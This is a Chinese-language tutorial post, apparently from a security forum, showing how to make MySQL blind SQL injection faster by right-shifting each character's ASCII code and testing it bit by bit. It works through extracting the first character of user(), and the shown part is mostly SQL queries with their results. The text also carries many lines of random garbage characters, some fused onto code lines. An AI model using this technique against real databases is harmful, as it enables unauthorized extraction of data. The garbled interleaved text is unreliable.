关于通过对8bit的ascii做右位移提高mysql盲注效率

admin

通过这种方法我们只需要做8次select来确定一个键值的第一位或第n位

# a9 C; r! U% Q
5 j8 B2 |: M& @9 P
$ J& y  m, ~3 X( g! N% }下面将以查询mysql数据库当中user()的第一位为例:
: l6 Q. q( x. e6 ?+ K- y/ y' Q
1 I& U! i2 k+ R; ?9 Z

ps:第二位,第三位依次类推 select substr(user(),2,1) mysql> select substr(user(),3,1)
$ d" c! y5 \4 Q5 }" ^" e+ j" Y
0 l. {8 Y4 M/ g% b3 U

首先执行如下sql语句:


7 q2 K; I, f3 {2 \- \- M
+ O: J+ j( C' l8 x! j+ |* fmysql> select (ascii((substr(user(),1,1))) >> 7)=0;
! A  @6 O+ t$ U$ Z( ^
2 C2 X* p$ N% C  Q( k; ?7 x7 _

我们将对这个8bit的ascii也就是user()的第一位做7次右偏移,也就是偏移到8bit的ascii的


. T9 J, h' w# ^4 x' \  t. w2 j
4 a* E! b; u% k3 {  `  v第一位并与0做等运算,如果,运算结果为0 说明第一位不为0,也就为1
8 v, m" V' Y1 o3 ^
- {( V, H# s' i* w+ \

  ~8 N2 F3 e: y. B如果运算结果为1,说明第一位为0,不为1
3 h) t4 j; H0 r- w8 A; x2 i1 u
9 ^1 Y, [" u' s& C* r3 \+ }

+————————————–+

- n& }( V9 D, x& p4 u) T2 j| (ascii((substr(user(),1,1))) >> 7)=0 |
& j' r% S+ q9 O! V" S0 P$ ^
+————————————–+

" v3 _  c$ g6 i0 Z| 1 |
! ^" {: A! g% D2 u! z8 |% J  p
4 l" h. w1 x4 t& z3 b" v+————————————–+

* H4 S6 d& ?7 s6 [+ O" W1 row in set (0.00 sec)

这样我们就确定这个8bit的ascii的第一位为0


- t+ q" T. J& m& h7 c, j3 [1 g
; Y1 f; z9 b7 ]$ `# q" A: C第二次我们来做6次右偏移来确定前两位


) u, E+ X& ?, i: h; E/ b# f
2 x# C! J( q. A0 t# k: s前两位可能是01或00,即依然可以与0做比较,
* I7 U' c. b6 ]1 D: O/ E0 S8 _. L
mysql> select (ascii((substr(user(),1,1))) >> 6)=0;

+————————————–+
, x3 {4 a& v" V7 @) b3 c
| (ascii((substr(user(),1,1))) >> 6)=0 |

+————————————–+
: ~% r$ e/ Y0 `; Z( p
5 [6 A3 a7 m6 @| 0 |

+————————————–+
: b# l7 ~/ m1 V( F2 W
1 row in set (0.00 sec)


4 ]3 N* z# \: h- x# l) N! @
4 Z; G; i- m- v6 `5 q! [9 [结果为0,即第二位为1
  u% y" w# R9 M* F2 \


开始猜测前三位为010或011

2 E2 c2 o) r+ \, O
& V& C1 h  P& F4 b& L
! |  k( g! p- Y2 _( U让我们看看010和011的ascii码是多少

7 D! z0 ^2 B8 V, p/ N0 F0 C
. _5 F  y) ]& i4 ~4 Z' m& @  Q
分别查询select b’011′ select b’010′


% s: K" C0 R# T8 T; m6 }' Q) b
获得结果 010 = 2 011 = 3


6 Q: G4 y7 k1 t# `2 Y
执行如下sql:
: O( F* y& y" W* u: O
0 u/ y" A5 N' Z

mysql> select (ascii((substr(user(),1,1))) >> 5)=2;
/ h9 K8 j. a( Z6 n0 W' [
$ K  z3 ?) M: C, h+————————————–+

| (ascii((substr(user(),1,1))) >> 5)=2 |
3 N1 K0 V" g* {6 i+ L; F- v% b
+————————————–+
1 {5 q8 g; @4 M& @
# w4 l3 `/ A  L. V  S| 0 |
& E2 H) l# S! f9 |7 S* g( \
4 L% f5 o. ^, f( Q) k/ V+————————————–+
' s8 n+ S- o" P  d6 r
即前三位不为010,而是011
- C2 l% }% m) O0 S' q

7 g6 {8 O8 u% |
: y+ `# c3 d& J- _直到获得最后一位


& a. {1 e+ V& S
( x9 m! v3 t. |0 v8 t6 U2 {4 x, b最终结果为:01110010

6 F* S1 g) o& Q, w6 N" P, H

转换一下:

8 Q5 I2 h1 A5 J! ]
. a5 `+ Y. m& d) b3 I
. C  l) w' L8 n+ h9 z5 L0 J6 Qselect b’01110010′
( J+ _" c" ^$ L, ^+ u$ R) b2 _: r
0 [' S% b. l& a# E

查询结果
+ n1 j, U' H9 w' P4 g1 O# R- T0 \+ w


6 {- b: b+ G4 m) W& L8 u5 O0 a; C+————-+
/ |3 ?1 {, T# y& d) ?7 B% j8 t
3 Z' y# ^! b3 ^$ E3 Q+ T7 q| b’01110010′ |
2 A. T, V( k" _( C, }7 I; j
+————-+
& y' n& c9 x- d. h+ C  L. D
) i: w$ i5 A3 N# |4 Z| r |

+————-+
8 R0 y6 `* F- J8 I5 [
1 row in set (0.00 sec)

- [7 V# h$ R/ H* {+ A5 p% ~) _

1 O- U2 a+ i% C# x这样我们就获得了user()的第一位.其它位依此类推